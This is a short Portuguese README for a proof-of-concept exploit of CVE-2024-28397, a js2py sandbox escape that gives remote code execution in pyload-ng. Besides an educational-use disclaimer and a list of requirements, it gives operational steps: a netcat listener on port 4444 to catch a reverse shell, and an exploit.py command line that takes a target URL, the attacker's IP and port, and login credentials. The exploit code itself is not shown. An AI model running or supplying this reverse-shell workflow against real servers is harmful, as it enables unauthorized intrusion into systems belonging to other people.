
Exploit de PoC para CVE-2024-28397 – Execução Remota de Código em pyload-ng via fuga de sandbox do js2py
Este repositório contém um exploit de Prova de Conceito (PoC) para CVE-2024-28397, uma vulnerabilidade de Execução Remota de Código que afeta pyload-ng devido ao uso inseguro de js2py.
Aviso:
Este PoC é apenas para fins educacionais e de pesquisa.
Não o utilize em sistemas que não possui ou para os quais não tenha permissão explícita para testar.
O autor não se responsabiliza por qualquer uso indevido deste código.
js2py em pyload-ngVocê precisará de Python 3.x, da biblioteca requests e do netcat para capturar o reverse shell.
nc -lvnp 4444
python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123